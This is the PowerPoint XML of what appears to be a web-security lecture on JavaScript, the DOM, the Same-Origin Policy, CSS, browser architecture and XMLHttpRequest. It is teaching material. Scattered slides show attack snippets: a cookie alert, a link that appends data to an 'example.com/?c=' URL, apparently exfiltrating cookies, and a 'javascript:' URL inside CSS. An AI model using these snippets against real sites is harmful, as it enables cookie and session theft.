              <a:t>Ability to attach listeners to objects for events (e.g. click, mouse over, etc.)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42508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JavaScript and the DOM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window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.location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'http://google.com/'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'&lt;script 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="..."&gt;&lt;/script&gt;'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.getElementsByTagName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'p'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es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.getElementById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es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es.firstChild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es.innerHTML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‘&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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=“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'http://google.com/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”&gt;A new link to Google&lt;/a&gt;'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alert(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‘My cookies are: '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29727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Policy, Revisited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enables dynamic inclusion of objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pP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lang="en-US" sz="20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=“http://example.com/?c=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+ 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'&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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&gt;'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A webpage may include objects and code from multiple domains</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Should </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> from one domain be able to access objects in other domains?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="312528" lvl="1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312528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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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  <a:p>
            <a:pPr marL="3125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Origins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820" y="1690688"/>
            <a:ext cx="5985588" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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head&gt;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body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&lt;p&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>This is my page.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&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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smtClean="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>password =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‘s3cr3t’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>;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&lt;iframe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean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lang="en-US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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1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goog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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’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‘http://google.com’</a:t>
            </a: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&gt;&lt;/iframe&gt;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body&gt;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0168" y="1690688"/>
            <a:ext cx="5674567" cy="4292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This is my page.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1" y="2340011"/>
            <a:ext cx="5513849" cy="265994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15212" y="4046388"/>
            <a:ext cx="5475514" cy="761988"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 7462"/>
              <a:gd name="adj2" fmla="val -1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JS from google.com read </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>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20350" y="5341717"/>
            <a:ext cx="5665237" cy="1132816"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 62290"/>
              <a:gd name="adj2" fmla="val -57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JS in the main context do the following: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t>(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>goog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t>’).cookie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2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popularity of the Web has grown, attackers have shifted their focus towards it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web apps often possess large degrees of authority</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Access to sensitive data on the client- and server-side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web apps can be exploited to abuse this authority</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Data breaches and theft</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Site Defacement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Invasion of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>privacy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Malware distribution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Beachhead into internal networks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11923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lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr" defTabSz="508254">
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3184" dirty="0" smtClean="0"/>
              <a:t>Origin = &lt;protocol, hostname, port&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr" defTabSz="508254">
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="376974" indent="-386715" defTabSz="508254">
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3184" dirty="0" smtClean="0"/>
              <a:t>The Same-Origin Policy (SOP) states that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3184" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>subjects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3184" dirty="0" smtClean="0"/>
              <a:t> from one </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3184" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3184" dirty="0" smtClean="0"/>
              <a:t> cannot access objects from another origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="376974" indent="-386715" defTabSz="508254">
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3184" dirty="0" smtClean="0"/>
              <a:t>This applies to JavaScript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JS from origin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2784" i="1" dirty="0" smtClean="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2784" dirty="0" smtClean="0"/>
              <a:t> cannot access objects from origin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2784" i="1" dirty="0" smtClean="0"/>
              <a:t>D’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1085958" lvl="2" indent="-386715" defTabSz="508254">
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2384" dirty="0" smtClean="0"/>
              <a:t>E.g. the iframe example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="773430" lvl="1" indent="-386715" defTabSz="508254">
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2784" dirty="0" smtClean="0"/>
              <a:t>However, JS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2784" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>included</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2784" dirty="0" smtClean="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2784" i="1" dirty="0" smtClean="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2784" dirty="0" smtClean="0"/>
              <a:t> can access all objects in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2784" i="1" dirty="0" smtClean="0"/>
              <a:t>D</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1085958" lvl="2" indent="-386715" defTabSz="508254">
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2384" dirty="0" smtClean="0"/>
              <a:t>E.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2384" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2384" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2384" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2384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sz="2384" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2384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579" y="1819404"/>
            <a:ext cx="11594841" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>1996: Netscape releases first implementation of Secure Socket Layer (SSLv3)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attributed to famous cryptographer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Tahar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Elgamal</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SSLv1 and SSLv2 had serious security problems and were never seriously released</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>1996: W3C releases the spec for Cascading Style Sheets (CSS1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>First proposed by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Håkon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lie, now at Opera</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Allows developers to separate content and markup from display attributes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>First implemented in IE 3, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>browser was fully compatible until IE 5 in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CSS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Cascading stylesheets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Language for styling HTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Decoupled from content and structure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Selectors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Match styles against DOM elements (id, class, positioning in tree, etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Directives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Set style properties on elements</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4791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CSS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Inline</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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&lt;span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style=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"display: none;"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&gt;&lt;/span&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2250">
              <a:solidFill>
                <a:srgbClr val="D7391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Embedded</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="416703" lvl="1" indent="-104176" defTabSz="321457">
              <a:spcBef>
                <a:spcPts val="1758"/>
              </a:spcBef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&lt;style&gt;body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color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 }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&lt;/style&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>External</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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&lt;link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rel=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"stylesheet"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"text/css"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href=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"/css/main.css"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718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CSS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body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font-family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sans-serif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endParaRPr sz="162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#content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width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75%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margin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auto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endParaRPr sz="162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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="162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#logo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background-image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url</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="162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(//</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="162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sz="162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/logo.png)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endParaRPr sz="162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b="1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.button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//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...</a:t>
            </a:r>
            <a:endParaRPr sz="162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endParaRPr sz="162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p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span</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="162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#icon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2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background-image</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="162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2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url</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="162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('</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="162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javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="162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:...')</a:t>
            </a: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31449">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="178587" algn="l"/>
                <a:tab pos="357175" algn="l"/>
                <a:tab pos="535762" algn="l"/>
                <a:tab pos="714350" algn="l"/>
                <a:tab pos="892937" algn="l"/>
                <a:tab pos="1071524" algn="l"/>
                <a:tab pos="1259041" algn="l"/>
                <a:tab pos="1437629" algn="l"/>
                <a:tab pos="1616216" algn="l"/>
                <a:tab pos="1794803" algn="l"/>
                <a:tab pos="1973391" algn="l"/>
                <a:tab pos="2151978" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="162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61045" y="4976326"/>
            <a:ext cx="3285634" cy="1130897"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -72279"/>
              <a:gd name="adj2" fmla="val -176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Beware: some browsers allow JS inside CSS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Architecture circa-1992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Side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Protocols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92165" y="3844760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Gopher</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>FTP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>HTTP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Document</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Renderer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HTML Parser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3998262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HTML</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/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3774592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537258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>
            <a:stCxn id="21" idx="1"/>
            <a:endCxn id="50" idx="4"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="1498923" y="4583541"/>
            <a:ext cx="1258155" cy="1549783"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 37639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1" idx="1"/>
            <a:endCxn id="20" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1" flipV="1">
            <a:off x="2564245" y="3774593"/>
            <a:ext cx="902970" cy="1357702"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -26005"/>
              <a:gd name="adj2" fmla="val 8386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Architecture circa-2015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Side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Protocols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338" y="3405920"/>
            <a:ext cx="239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FTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>HTTP 1.0/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>HTTP 2.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>SSL and TLS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>Websocket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Document</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Model and Renderer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HTML Parser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98" y="5140867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HTML</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Elbow Connector 22"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="11" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="1723965" y="3774593"/>
            <a:ext cx="840280" cy="548752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64245" y="5132295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CSS Parser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757077" y="4323345"/>
            <a:ext cx="142085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JS Runtime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77927" y="4570688"/>
            <a:ext cx="1613108" cy="89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9859" y="420135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JS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70185" y="5420470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2915" y="5042201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CSS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8706" y="4034790"/>
            <a:ext cx="287" cy="2885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1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1703069" y="4889242"/>
            <a:ext cx="861177" cy="50325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>
            <a:off x="1704396" y="4583542"/>
            <a:ext cx="1052681" cy="8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Magnetic Disk 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="495609" y="5691676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52" name="Elbow Connector 51"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="14" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3384433" y="3767179"/>
            <a:ext cx="712150" cy="44831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370" y="598841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Cookies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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0" y="2122475"/>
            <a:ext cx="1005227" cy="1005227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9194338" y="3405920"/>
            <a:ext cx="1561147" cy="178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Application Code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(Java, PHP, Python, Node,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7" name="Flowchart: Magnetic Disk 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10981615" y="2914914"/>
            <a:ext cx="1071360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68" name="Straight Arrow Connector 67"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="66" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8729268" y="4299451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2" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8729268" y="5420470"/>
            <a:ext cx="2267330" cy="242367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10755485" y="4299451"/>
            <a:ext cx="763083" cy="841416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6" idx="3"/>
            <a:endCxn id="67" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="10755485" y="3860638"/>
            <a:ext cx="761810" cy="43881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271892" y="4029971"/>
            <a:ext cx="5556" cy="28764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771549" y="4843739"/>
            <a:ext cx="287" cy="2885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07" y="1407968"/>
            <a:ext cx="11538856" cy="5344680"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>1999: Microsoft enables access to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>IXMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ActiveX plugin in IE 5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Allows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to programmatically issue HTTP requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Adopted as closely as possible by Netscape’s Gecko engine in 2000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Eventually led to AJAX, REST, and other crazy Web-dev buzzwords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XMLHttpRequest (XHR)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API for asynchronous network </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" smtClean="0"/>
              <a:t>requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" smtClean="0"/>
              <a:t> in JavaScript</a:t>
            </a:r>
            <a:endParaRPr sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Browser-specific API (</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" smtClean="0"/>
              <a:t>still</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" smtClean="0"/>
              <a:t> to this day</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Often abstracted via a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" smtClean="0"/>
              <a:t>library</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" smtClean="0"/>
              <a:t> (jQuery)</a:t>
            </a:r>
            <a:endParaRPr sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>SOP restrictions apply </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" smtClean="0"/>
              <a:t>with exceptions; more on this later</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Typical workflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Handle client-side </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" smtClean="0"/>
              <a:t>event</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" smtClean="0"/>
              <a:t> (e.g. button click)</a:t>
            </a:r>
            <a:endParaRPr sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Invoke XHR to server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Load data </a:t>
